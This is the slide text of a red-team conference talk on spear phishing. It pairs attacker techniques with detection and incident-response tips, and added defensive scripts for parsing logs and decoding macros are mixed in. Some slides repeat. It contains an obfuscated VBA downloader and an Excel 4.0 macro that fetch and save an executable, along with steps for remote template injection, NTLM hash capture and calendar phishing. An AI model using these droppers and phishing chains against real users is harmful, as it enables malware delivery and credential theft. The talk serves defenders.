Purple Haze
The SpearPhishing Experience
feat. Jesse Nebling
Warning! Challenger approaching
Jesse Nebling (@bashexplode)
● Internal Red Team
● Former Consultant
● Seattle, WA
● Windows exploitation
● “Purple Team” advocate
● Music production
● Stoked to be here
A new foe has appeared!
During a Red Team operation, treat
the attacker as a real Adversary.
What’s the point?
● Spear Phishing trial and error by both Adversaries and Blue Teams
● Pinpoint areas that may help tighten security and foster detection
● Give Blue Teams a glimpse of how Adversaries are plotting against them
Agenda
● Recon: Network & (Security) Tech Stack
● Adversarial OpSec:
○ Testing dropper malware
○ Image injection and text message notifications
○ One-time use tokens for phishing payloads
● Malicious Attachments:
○ Remote Template injection
○ VBA macros
○ Calendar phishing
○ Excel 4.0
Recon: Network & (Security) Tech Stack
Typical OSINT Activities:
● whois
● Subdomain lookups
● Job openings for specific technologies
● Current employee job descriptions
● Social Media
● File metadata
● Public code repositories (e.g. github)
● Sites that share tech stacks (e.g. stackshare.io)
● Finding services that expose internal domain names
● Bouncing emails off of domains
What the adversaries use this for:
● Create firewall rules to C2 servers
● Discover single factor authentication entry points
● Environmental keying
● Crafting malicious payloads
● Tailoring tradecraft
Relevant Threat Actor: All
Tool reference: https://github.com/bashexplode/pacifist-toolkit
Recon: Network & (Security) Tech Stack
MS Lync/Skype for Business services give the base64-encoded internal NetBIOS domain name and FQDN when invalid credentials are entered:
Bounced email uncovering internal host and domain name as well as email sandbox service:
Relevant Threat Actor: All
Talk reference: The Weakest Lync (DerbyCon 2016)
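Added example, not from the talk or its toolkit: the disclosure above comes from the NTLM Type 2 CHALLENGE_MESSAGE (the base64 token in the WWW-Authenticate: NTLM header), whose TargetInfo AV_PAIRs carry the NetBIOS and DNS names. Parsing it lets a defender see exactly which internal names an exposed endpoint hands out; the challenge below is constructed with made-up names, and the AV_PAIR ids follow MS-NLMP.

```python
import base64
import struct

# AV_PAIR ids from MS-NLMP 2.2.2.1 that carry host/domain names
AV_IDS = {
    1: "NetBIOS computer name",
    2: "NetBIOS domain name",
    3: "DNS computer name",
    4: "DNS domain name",
    5: "DNS tree name",
}


def parse_ntlm_challenge(token_b64):
    """Decode the base64 token from 'WWW-Authenticate: NTLM <token>' and
    return the names a Type 2 CHALLENGE_MESSAGE discloses."""
    msg = base64.b64decode(token_b64)
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE (type 2)")
    # Fixed layout: TargetNameFields @12, NegotiateFlags @20, ServerChallenge @24,
    # Reserved @32, TargetInfoFields @40 (each *Fields = Len, MaxLen, Offset)
    name_len, _, name_off = struct.unpack_from("<HHI", msg, 12)
    info_len, _, info_off = struct.unpack_from("<HHI", msg, 40)
    names = {"TargetName": msg[name_off:name_off + name_len].decode("utf-16-le")}
    pos, end = info_off, info_off + info_len
    while pos + 4 <= end:
        av_id, av_len = struct.unpack_from("<HH", msg, pos)
        pos += 4
        if av_id == 0:  # MsvAvEOL terminates the list
            break
        if av_id in AV_IDS:
            names[AV_IDS[av_id]] = msg[pos:pos + av_len].decode("utf-16-le")
        pos += av_len
    return names


def build_challenge(nb_domain, nb_host, dns_domain, dns_host):
    """Constructed Type 2 challenge for the demo: what a server's response
    looks like when it advertises internal names (all values are made up)."""
    def u16(s):
        return s.encode("utf-16-le")

    target = u16(nb_domain)
    pairs = b"".join(
        struct.pack("<HH", av_id, len(u16(v))) + u16(v)
        for av_id, v in ((2, nb_domain), (1, nb_host), (4, dns_domain),
                         (3, dns_host), (5, dns_domain))
    ) + struct.pack("<HH", 0, 0)  # MsvAvEOL
    name_off = 48  # header size without the optional Version field
    info_off = name_off + len(target)
    msg = (
        b"NTLMSSP\x00" + struct.pack("<I", 2)
        + struct.pack("<HHI", len(target), len(target), name_off)
        + struct.pack("<I", 0x00818205)  # NegotiateFlags (constructed value)
        + b"\x11" * 8                    # ServerChallenge (constructed)
        + b"\x00" * 8                    # Reserved
        + struct.pack("<HHI", len(pairs), len(pairs), info_off)
        + target + pairs
    )
    return base64.b64encode(msg).decode("ascii")


def internal_names_exposed(names, public_suffixes=(".com", ".net", ".org")):
    """Heuristic: values without a public suffix (bare NetBIOS names, .local
    zones) are internal naming the endpoint should not be advertising."""
    return {k: v for k, v in names.items()
            if not any(v.lower().endswith(s) for s in public_suffixes)}


if __name__ == "__main__":
    token = build_challenge("CORP", "LYNC01", "corp.example.local",
                            "lync01.corp.example.local")
    names = parse_ntlm_challenge(token)
    for key, value in names.items():
        print(f"{key:22s} {value}")
    print("internal-looking names:", internal_names_exposed(names))
```

Point it at the token your own externally reachable Lync/Skype or Exchange endpoint returns to a bad credential; if the decoded names differ from your public DNS, that is the leak the slide describes.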
Recon: Network & (Security) Tech Stack
Areas of potential detection:
● Mass downloads of externally hosted files
● Emails being bounced against non-existent email accounts
● Bruteforcing single factor authentication pages
Additional time cost to attacker:
● Egress points outside of networks registered under company’s name
● External services covered fully by multifactor authentication
● Employees only have general job descriptions
● Job descriptions do not have specific technologies
● Metadata is wiped from all externally hosted files
● Tech stack is not publicly shared
● Wildcard emails not allowed / cannot bounce emails
Relevant Threat Actor: All
Tool reference: https://github.com/bashexplode/pacifist-toolkit
Adversarial OpSec: Testing Dropper Malware
Relevant Threat Actor: All
Assume the Adversary is extremely dedicated. Take all information uncovered from reconnaissance and set up an environment that mimics the target’s tech stack.
● Discover methods to bypass AV and EDR tools
● Learn what techniques can be used to move laterally and escalate privileges without triggering alerts in the tech stack
Adversarial OpSec: Image Injection & Text Messaging
Relevant Threat Actor: All
To learn whether the document was opened and to alert on potential blue team activity.
● Set up payload to reach out to a benign image hosted on the web server
○ Microsoft Word -> Insert Quick Parts -> Field -> IncludePicture -> Data not stored with document
● Any time the image is requested, send a text message for instant notification that the payload has been opened
● UNC path injection can also be used to obtain the NTLMv2 hash and trigger an alert
Sample Python text message script:
import smtplib

# Gmail SMTP with STARTTLS; the carrier's email-to-SMS gateway (<number>@vtext.com is Verizon's) delivers the body as a text message
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login('<gmail_address>', '<gmail_password>')
server.sendmail('<from>', '<number>@vtext.com', 'PWND')
server.quit()
User Agent for Image GET Requests (Win 10):
● MS Word Office 365 Version 16.0.12026: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
● MS Word Version 14.0.4760.1000.20344: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14)
SMS email reference: https://bit.ly/32XiN4l
Adversarial OpSec: One-Time Use Tokens
Used in combination with network firewall rules to help further tighten access control on malicious payloads.
● Set up a staging server with a database that tracks token usage
● Set up payload to reach out to a web page with a token
● If it is the first (or second) time the token is used, redirect to the real payload
● Otherwise, redirect to a benign page or benign payload
● Set up htaccess to redirect atypical user agents
Relevant Threat Actor: All
MITRE ATT&CK ID: T1192
Tool reference: https://github.com/bashexplode/otu-plz
Adversarial OpSec
Areas of potential detection:
● Office/PDF reader processes with outbound network connectivity (HTTP(S), SMB, DNS)
● Malicious links in emails from non-trusted domains
● Previously mentioned GET requests with Office User Agent strings
● For the extremely curious, mass phishing campaigns with similar links and one-time use tokens can be used to track down an unclicked link to analyze a payload
Incident Response and Defense tips:
● Avoid downloading payloads for analysis directly from malicious servers; htaccess redirection may be in place
● Assume the adversary knows how to get around EDR tools and AV; after tuning these for lesser skilled adversaries, focus on other anomalous activity such as low-level users using administrative command line utilities, lateral movement from HR department workstations, etc.
● Disable SMB outbound traffic
Relevant Threat Actor: All
MITRE ATT&CK ID: T1192
Malicious Attachments Overview
Many email sandboxing/filtering solutions have cracked down on well-known payloads and block them from being delivered to the recipient altogether.
Dedicated adversaries will discover ways around these protections...
Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0, Tropic Trooper
MITRE ATT&CK ID: T1221
Malicious Attachments: Remote Template Injection
Pre-staging technique to avoid sending the true payload and risking discovery of C2 infrastructure
● Create a document template that has a malicious macro in it
● Set up a burner staging server and host the Word document template on a site that looks legitimate
● Create a benign document and edit the XML file stored in the Word document archive to point at the hosted template file
○ Document.docx\word\_rels\settings.xml.rels
● Allows .docx files to run macros while nothing malicious is in the document sent to the user!
Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0...
MITRE ATT&CK ID: T1221
Remote Template Web Requests (Win 10):
● MS Word Office 2019 Version 16.0.12026
● MS Word Version 14.0.4760.1000.20344
OPTIONS /payload-dir/ "Microsoft Office Word 2014"
OPTIONS /payload-dir/ "Microsoft Office Word 2014"
HEAD /payload-dir/Template.dotm "Microsoft Office Word 2014"
OPTIONS /payload-dir/ "Microsoft Office Word 2014"
GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; ms-office; MSOffice 16)"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
OPTIONS /payload-dir/ "Microsoft Office Protocol Discovery"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
x2 OPTIONS /payload-dir/Template.dotm "Microsoft-WebDAV-MiniRedir/10.0.17134"
x4 PROPFIND /payload-dir/ "Microsoft-WebDAV-MiniRedir/10.0.17134"
GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14)"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
x2 PROPFIND / "Microsoft-WebDAV-MiniRedir/10.0.17134"
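The request sequences above, together with the image GET user agents from the image-injection slide, are what a web proxy sees; this is the "GET requests with Office User Agent strings" detection from the Adversarial OpSec slide. As an added example that is not part of the talk, the logic below flags Office-originated fetches in proxy logs and names the stage of the sequence each request belongs to. The log format, host names and client addresses are constructed.

```python
import re
from collections import defaultdict

# User-Agent markers from the talk's captures: Word fetching a remote image or
# template (MSOffice 14 / MSOffice 16), the Office probe agents, and the WebDAV fallback.
OFFICE_UA_MARKERS = (
    "ms-office",
    "Microsoft Office Word",
    "Microsoft Office Existence Discovery",
    "Microsoft Office Protocol Discovery",
    "Microsoft-WebDAV-MiniRedir",
)
TEMPLATE_EXTS = (".dotm", ".dotx", ".dot")
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")

# Constructed proxy log format: <ts> <client> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(rec):
    """Name the stage of the Office fetch sequence a request belongs to, or None if not Office."""
    ua = rec["ua"]
    path = rec["url"].split("?", 1)[0].lower()
    if not any(marker.lower() in ua.lower() for marker in OFFICE_UA_MARKERS):
        return None
    if ua.startswith("Microsoft-WebDAV-MiniRedir"):
        return "webdav-fallback"   # OPTIONS/PROPFIND retries after the HTTP fetch
    if rec["method"] in ("OPTIONS", "HEAD"):
        return "office-probe"      # Existence/Protocol Discovery and "Word 2014" probes
    if path.endswith(TEMPLATE_EXTS):
        return "remote-template"   # .dotm pulled via settings.xml.rels (T1221)
    if path.endswith(IMAGE_EXTS):
        return "remote-image"      # IncludePicture beacon from the image-injection slide
    return "office-other"


def find_office_fetches(lines):
    """Group Office-originated requests per (client, external host), keeping log order."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec)
        if kind is None:
            continue
        host = re.sub(r"^https?://", "", rec["url"]).split("/", 1)[0]
        hits[(rec["client"], host)].append((rec["method"], rec["url"], kind))
    return dict(hits)


def summarize(hits):
    """Stages seen per (client, host), so an analyst can spot template pulls and beacons at a glance."""
    return {key: sorted({kind for _, _, kind in seq}) for key, seq in hits.items()}


# Constructed sample: one workstation opening a phishing document (the sequence mirrors the
# talk's capture; host and addresses are made up) plus ordinary browser traffic that must not fire.
SAMPLE_LOG = """\
2019-10-12T14:02:11Z 10.0.0.23 OPTIONS http://staging.example.net/payload-dir/ 200 "Microsoft Office Word 2014"
2019-10-12T14:02:11Z 10.0.0.23 HEAD http://staging.example.net/payload-dir/Template.dotm 200 "Microsoft Office Word 2014"
2019-10-12T14:02:12Z 10.0.0.23 GET http://staging.example.net/payload-dir/Template.dotm 200 "Mozilla/4.0 (compatible; ms-office; MSOffice 16)"
2019-10-12T14:02:12Z 10.0.0.23 HEAD http://staging.example.net/payload-dir/Template.dotm 200 "Microsoft Office Existence Discovery"
2019-10-12T14:02:12Z 10.0.0.23 OPTIONS http://staging.example.net/payload-dir/ 200 "Microsoft Office Protocol Discovery"
2019-10-12T14:02:13Z 10.0.0.23 PROPFIND http://staging.example.net/payload-dir/ 405 "Microsoft-WebDAV-MiniRedir/10.0.17134"
2019-10-12T14:02:15Z 10.0.0.23 GET http://staging.example.net/img/logo.jpg 200 "Mozilla/4.0 (compatible; ms-office; MSOffice 16)"
2019-10-12T14:02:20Z 10.0.0.23 GET https://www.example.com/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/77.0"
2019-10-12T14:02:21Z 10.0.0.45 GET http://cdn.example.org/app.js 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/69.0"
"""

if __name__ == "__main__":
    hits = find_office_fetches(SAMPLE_LOG.splitlines())
    for (client, host), stages in summarize(hits).items():
        print(f"{client} -> {host}: {', '.join(stages)}")
```

A single "office-probe" from a trusted SharePoint or template server is normal; a probe sequence followed by a template or image GET to a host nobody in the business recognizes is the pattern worth an alert.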
Malicious Attachments: VBA Macros
Classic Initial Access technique that has gone through many iterations
● WMI execution
● PowerShell download cradles
● Hiding variables in document properties
● Hiding variables in document XML
● Hiding variables in images/alternative text
● Reverse strings and replace characters
● Use words relevant to business as variables
● Stage the payload
● Execute outside of Office ancestry
Relevant Threat Actors: APT12, APT19, APT28, FIN4...
MITRE ATT&CK IDs: T1193, T1064
References: VBA Stomping - Advanced Malware Techniques (DerbyCon 2018)
Sub Auto_Open(): downloadFile : XSL : PrivacyMode : End Sub
Function PrivacyMode()
ActiveSheet.Shapes(1).Visible = msoFalse
End Function
Function downloadFile()
' Replacement characters
accounting = "#$"
' stage URL https://example.com/payload.jpg
finance = "gp#$j.d#$aoly#$ap/m#$oc.e#$lpmax#$e//#$sp#$tth"
' where to save the downloaded file to - C:\Users\<user>\Desktop\text.exe
path = Environ("userprofile") & Application.PathSeparator & _
StrReverse(Replace("ex#$e.ts#$et\po#$tks#$eD", accounting, ""))
' MSXML2.ServerXMLHTTP object
Set Tuesday = CreateObject(StrReverse(Replace("PTTHLMXre#$vreS.2LMXSM", accounting, "")))
' Creating and sending GET request for payload
Tuesday.Open "GET", finance, False
Tuesday.send
If Tuesday.Status = 200 Then
' ADODB.Stream object
Set January = CreateObject(StrReverse(Replace("ma#$ertS.B#$DODA", accounting, "")))
January.Open
January.Type = 1
January.Write Tuesday.ResponseBody
January.Position = 0
January.SaveToFile path
January.Close
End If
End Function
' Execution via XSL
Function XSL()
…SNIP…
End Sub
Malicious Attachments: Excel 4.0/VBA Hybrid
Relevant Threat Actor: TA505
Use an old version of Excel macros to execute code that bypasses current detection tools
● Stan Hegt and team showed how to execute shellcode directly through Windows APIs and Excel 4.0 macros at DerbyCon
● I wanted to get away from two things with this method
○ Spawning as a child process of Excel
○ Giving away C2 infrastructure if the doc is discovered
● Came up with my own attack flow with an Excel 4.0 downloader and VBA execution
References: The MS Office Magic Show (DerbyCon 2018)
Sample Excel 4.0 Macro:
● Insert... -> MS Excel 4.0 Macro
● Set Define Name for Cell A1 to “Auto_Open”
=REGISTER("Urlmon","URLDownloadToFileA","JJCCJJ","URLD",,1,9)
=URLD(,"https://example.com/logo.jpg","C:\temp\artifact.exe",0,)
=WAIT(NOW() + "00:00:05")
'VBA Execution Function
=Taxes()
=HALT()
User Agent for GET Requests (Win 10):
● MS Word Office 2019 Version 16.0.12026
● MS Word Version 14.0.4760.1000.20344
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; wbx 1.0.0; Zoom 3.6.0)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Malicious Attachments
Points of discovery:
● Documents with outbound network connectivity
● VBA scripts run from documents
● Execution as a child process of an Office product
● Old format versions of Office documents (<Office 2003)
● Calls to misused objects and functions in Office VBA macros:
○ C08AFD90-F2A1-11D1-8455-00A0C91F3880
○ Microsoft.XMLDOM
○ Schedule.Service
○ ADODB.Stream
○ MSXML2.ServerXMLHTTP
○ ActiveSheet.Shapes(#).Visible = msoFalse
○ StrReverse
○ Replace
Incident Response tip:
● Sandbox payloads on a system representative of your domain without outbound connectivity (environmental keying bypasses this)
● Use oledump.py to scrape VBA and Excel 4.0 (plugin_biff.py) macro content and view the code
Relevant Threat Actor: TA505
Tool reference: https://github.com/DidierStevens/DidierStevensSuite
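As an added example (not from the talk), a small static triage helper for macro text dumped with oledump.py: it resolves the StrReverse/Replace string trick used in the VBA sample above and scans both the raw and the decoded text for the misused objects listed here, so the analyst sees what a plain string scan would miss. The macro text it runs on is a constructed sample modelled on the slide, with a placeholder URL and file name.

```python
import re

# Objects and functions the talk lists as commonly misused in Office VBA macros
SUSPICIOUS_TOKENS = (
    "C08AFD90-F2A1-11D1-8455-00A0C91F3880",
    "Microsoft.XMLDOM",
    "Schedule.Service",
    "ADODB.Stream",
    "MSXML2.ServerXMLHTTP",
    ".Visible = msoFalse",
    "StrReverse",
    "Replace",
)

STRING_LIT = re.compile(r'"([^"\n]*)"')
CONST_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"\n]*)"\s*$', re.M)
# Replace("<literal>", <var>, "") : the separator variable is the second argument
REPLACE_WITH_VAR = re.compile(r'Replace\(\s*"[^"\n]*"\s*,\s*(\w+)\s*,\s*""\s*\)', re.I)


def junk_separators(vba):
    """Separator strings the macro strips with Replace(), resolved from their variable assignments."""
    consts = dict(CONST_ASSIGN.findall(vba))
    return sorted({consts[v] for v in REPLACE_WITH_VAR.findall(vba) if v in consts})


def decode(literal, junk):
    """Undo StrReverse(Replace(literal, junk, "")): drop the separator, then reverse."""
    return literal.replace(junk, "")[::-1]


def decode_literals(vba):
    """Map every string literal that carries a known separator to its decoded form."""
    decoded = {}
    for junk in junk_separators(vba):
        for lit in STRING_LIT.findall(vba):
            if junk in lit and lit != junk:
                decoded[lit] = decode(lit, junk)
    return decoded


def indicator_hits(text):
    return sorted(tok for tok in SUSPICIOUS_TOKENS if tok.lower() in text.lower())


def triage(vba):
    """Raw vs. decoded indicator hits: the difference is what the string tricks hide from a plain scan."""
    decoded = decode_literals(vba)
    return {
        "decoded": decoded,
        "raw_hits": indicator_hits(vba),
        "all_hits": indicator_hits(vba + "\n" + "\n".join(decoded.values())),
    }


# Constructed sample following the pattern of the talk's macro (separator "#$", reversed
# strings); the URL and file name are placeholders, not real infrastructure.
SAMPLE_VBA = r'''
Sub Auto_Open(): downloadFile : PrivacyMode : End Sub
Function PrivacyMode()
    ActiveSheet.Shapes(1).Visible = msoFalse
End Function
Function downloadFile()
    accounting = "#$"
    finance = "gp#$j.d#$aoly#$ap/m#$oc.e#$lpmax#$e//:#$sp#$tth"
    path = Environ("userprofile") & Application.PathSeparator & _
        StrReverse(Replace("ex#$e.ts#$et\po#$tks#$eD", accounting, ""))
    Set Tuesday = CreateObject(StrReverse(Replace("PTTHLMXre#$vreS.2LMXSM", accounting, "")))
    Set January = CreateObject(StrReverse(Replace("ma#$ertS.B#$DODA", accounting, "")))
End Function
'''

if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for lit, plain in result["decoded"].items():
        print(f"{lit!r:50} -> {plain}")
    print("plain scan :", result["raw_hits"])
    print("with decode:", result["all_hits"])
```

The decoded strings also give the analyst the staging URL and drop path to hunt for in proxy and endpoint logs without ever contacting the staging server.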
Malicious Attachments: Calendar Phishing
Make a meeting invite notification pop up posing as an important meeting, with a link to presentation material or to conference software to view the meeting
● Create a calendar event and include the victim as an attendee
● Attach a malicious link or document to the invite
● Opt out of sending an invite email
● Shells?
Points of discovery:
● Meetings originating from non-trusted domain email addresses
● Meetings that appear without an emailed meeting invite
Incident Response tip:
● Get the business to disable automatic adding of invitations to the calendar
Relevant Threat Actor: Scammers, me, Future Threat Actors probably
Thank you for playing!
Thanks for your time and attention.
Questions?

Toorcon - Purple Haze: The Spear Phishing Experience

Recon: Network & (Security) Tech Stack
Areas of potential detection:
● Mass downloads of externally hosted files
● Emails being bounced against non-existent email accounts
● Bruteforcing single factor authentication pages
Additional time cost to attacker:
● Egress points outside of networks registered under company’s name
● External services fully covered by multifactor authentication
● Employees only have general job descriptions
● Job descriptions do not have specific technologies
● Metadata is wiped from all externally hosted files
● Tech stack is not publicly shared
● Wildcard emails not allowed/Cannot bounce emails
Relevant Threat Actor: All
Tool reference: https://github.com/bashexplode/pacifist-toolkit
Adversarial OpSec: Testing Dropper Malware
Assume the Adversary is extremely dedicated. Take all information uncovered from reconnaissance and set up an environment that mimics the target’s tech stack.
● Discover methods to bypass AV and EDR tools
● Learn what techniques can be used to move laterally and escalate privileges without triggering alerts in the tech stack
Relevant Threat Actor: All
Adversarial OpSec: Image Injection & Text Messaging
To understand if a document was opened and alert on potential blue team activity.
● Set up payload to reach out to a benign image hosted on the web server
○ Microsoft Word -> Insert Quick Parts -> Field -> IncludePicture -> Data not stored with document
● Any time the image is requested, send a text message for instant notification that the payload has been opened
● UNC path injection can also be used to obtain an NTLMv2 hash and obtain an alert
Relevant Threat Actor: All
SMS email reference: https://bit.ly/32XiN4l

Sample Python text message script:
import smtplib
# Send the text through the carrier's email-to-SMS gateway (vtext.com is Verizon's)
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login('<gmail_address>', '<gmail_password>')
server.sendmail('<from>', '<number>@vtext.com', 'PWND')
server.quit()

User Agent for Image GET Requests (Win 10):
● MS Word Office 365 Version 16.0.12026: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
● MS Word Version 14.0.4760.1000.20344: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14)
Adversarial OpSec: One-Time Use Tokens
Used in combination with network firewall rules to help further tighten access control on malicious payloads.
● Set up a staging server with a database that tracks token usage
● Set up payload to reach out to a web page with a token
● If it is the first (or second) time the token is used, redirect to the real payload
● Otherwise, redirect to a benign page or benign payload
● Set up htaccess to redirect atypical user agents
Relevant Threat Actor: All
MITRE ATT&CK ID: T1192
Tool reference: https://github.com/bashexplode/otu-plz
Adversarial OpSec
Areas of potential detection:
● Office/PDF reader processes with outbound network connectivity (HTTP(S), SMB, DNS)
● Malicious links in emails from non-trusted domains
● Previously mentioned GET requests with Office User Agent strings
● For the extremely curious, mass phishing campaigns with similar links and one-time use tokens can be used to track down an unclicked link to analyze a payload
Incident Response and Defense tips:
● Stray from attempting to download payloads for analysis directly from malicious servers; htaccess redirection may be in place
● Assume the adversary knows how to get around EDR tools and AV; after tuning these for lesser skilled adversaries, focus on other anomalous activity such as low-level users using administrative command line utilities, lateral movement from HR department workstations, etc.
● Disable SMB outbound traffic
Relevant Threat Actor: All
MITRE ATT&CK ID: T1192
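The first detection area above (Office and PDF reader processes making outbound connections) and the "child process of an Office product" point from the Malicious Attachments discovery slide both fall out of ordinary endpoint telemetry. The script below is an added example, not from the talk: it walks Sysmon-style process-create (EventID 1) and network-connect (EventID 3) records exported as JSON and raises both findings. Field names follow Sysmon (Image, ParentImage, DestinationIp, DestinationPort); the event records, the process list and the internal address ranges are constructed assumptions for this example.

```python
"""Office process telemetry checks (added example, not from the talk)."""
import ipaddress
import json
from pathlib import PureWindowsPath

# Processes that should not normally open network connections themselves.
# Outlook legitimately speaks HTTPS, so it is only watched as a parent.
NETWORK_WATCH = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe"}
PARENT_WATCH = NETWORK_WATCH | {"outlook.exe"}
# Destination ports named on the slide: HTTP(S), SMB, DNS
WATCHED_PORTS = {80: "HTTP", 443: "HTTPS", 445: "SMB", 53: "DNS"}
# Assumption: RFC1918 and loopback count as internal; extend for your ranges.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def basename(image):
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(image).name.lower()

def is_external(ip):
    """True when the destination is outside the internal ranges above."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not any(addr in net for net in INTERNAL_NETS)

def analyze(events):
    """Return a list of findings for Sysmon EventID 1 and 3 records."""
    findings = []
    for ev in events:
        image = basename(ev.get("Image", ""))
        if ev.get("EventID") == 3 and image in NETWORK_WATCH:
            port = int(ev.get("DestinationPort", 0))
            if port in WATCHED_PORTS:
                findings.append({
                    "kind": "office_network",
                    "process": image,
                    "protocol": WATCHED_PORTS[port],
                    "destination": ev.get("DestinationIp"),
                    "external": is_external(ev.get("DestinationIp", "")),
                })
        elif ev.get("EventID") == 1:
            parent = basename(ev.get("ParentImage", ""))
            if parent in PARENT_WATCH:
                findings.append({
                    "kind": "office_child",
                    "parent": parent,
                    "child": image,
                    "command_line": ev.get("CommandLine", ""),
                })
    return findings

# Constructed sample: a Word HTTPS connection, a Word SMB connection (the
# UNC-path/NTLMv2 case), cmd.exe spawned by Excel, and two benign events
# that must not fire (a browser connection, notepad under explorer).
SAMPLE_EVENTS = json.loads(r"""[
 {"EventID": 3, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
  "DestinationIp": "203.0.113.10", "DestinationPort": 443},
 {"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
  "DestinationIp": "203.0.113.10", "DestinationPort": 443},
 {"EventID": 3, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
  "DestinationIp": "203.0.113.10", "DestinationPort": 445},
 {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
  "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
  "CommandLine": "cmd.exe /c C:\\temp\\artifact.exe"},
 {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe",
  "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}
]""")

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The SMB finding is the one worth an automatic block, since the slide's defensive tip is to disable outbound SMB anyway; the HTTPS finding from Word needs the destination and the document that was open to triage, which is why the record keeps the raw destination address rather than only the external flag.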
Malicious Attachments Overview
Many email sandboxing/filtering solutions have cracked down on well-known payloads and deny delivery to the recipient altogether. Dedicated adversaries will discover ways around these protections...
Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0, Tropic Trooper
MITRE ATT&CK ID: T1221
Malicious Attachments: Remote Template Injection
Pre-staging technique to abstain from sending the true payload and risking discovery of C2 infrastructure
● Create a document template that has a malicious macro in it
● Set up a burner staging server and host the Word document template on a site that looks legitimate
● Create a benign document and edit the XML file stored in the Word document archive to point at the hosted template file
○ Document.docx\word\_rels\settings.xml.rels
● Allows docx files to run macros, and nothing malicious is in the document sent to the user!
Relevant Threat Actor: APT28, DarkHydrus, Dragonfly 2.0...
MITRE ATT&CK ID: T1221
Remote Template Web Requests (Win 10):
● MS Word Office 2019 Version 16.0.12026:
OPTIONS /payload-dir/ "Microsoft Office Word 2014"
OPTIONS /payload-dir/ "Microsoft Office Word 2014"
HEAD /payload-dir/Template.dotm "Microsoft Office Word 2014"
OPTIONS /payload-dir/ "Microsoft Office Word 2014"
GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; ms-office; MSOffice 16)"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery"
OPTIONS /payload-dir/ "Microsoft Office Protocol Discovery"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery" x2
● MS Word Version 14.0.4760.1000.20344:
OPTIONS /payload-dir/Template.dotm "Microsoft-WebDAV-MiniRedir/10.0.17134" x4
PROPFIND /payload-dir/ "Microsoft-WebDAV-MiniRedir/10.0.17134"
GET /payload-dir/Template.dotm "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; Tablet PC 2.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; ms-office; MSOffice 14)"
HEAD /payload-dir/Template.dotm "Microsoft Office Existence Discovery" x2
PROPFIND / "Microsoft-WebDAV-MiniRedir/10.0.17134"
